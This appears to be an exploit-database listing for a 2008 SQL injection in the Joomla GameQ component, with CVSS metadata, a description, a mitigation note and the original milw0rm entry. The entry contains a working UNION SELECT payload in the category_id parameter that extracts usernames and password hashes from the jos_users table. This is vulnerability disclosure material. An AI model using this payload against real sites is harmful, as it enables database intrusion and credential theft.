header-logo
Suggest Exploit
vendor:
GameQ
by:
His0k4
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: GameQ
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component GameQ Remote SQL injection

A vulnerability in the Joomla Component GameQ allows an attacker to inject arbitrary SQL commands. This is done by manipulating the 'category_id' parameter in a 'index.php' script. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.
Source

Exploit-DB raw data:

/---------------------------------------------------------------\
\                                				/
/         Joomla Component GameQ Remote SQL injection           \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_gameq&task=page&category_id=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14 FROM jos_users--

# milw0rm.com [2008-06-07]

Navigation

Suggest Exploit

Services By CQR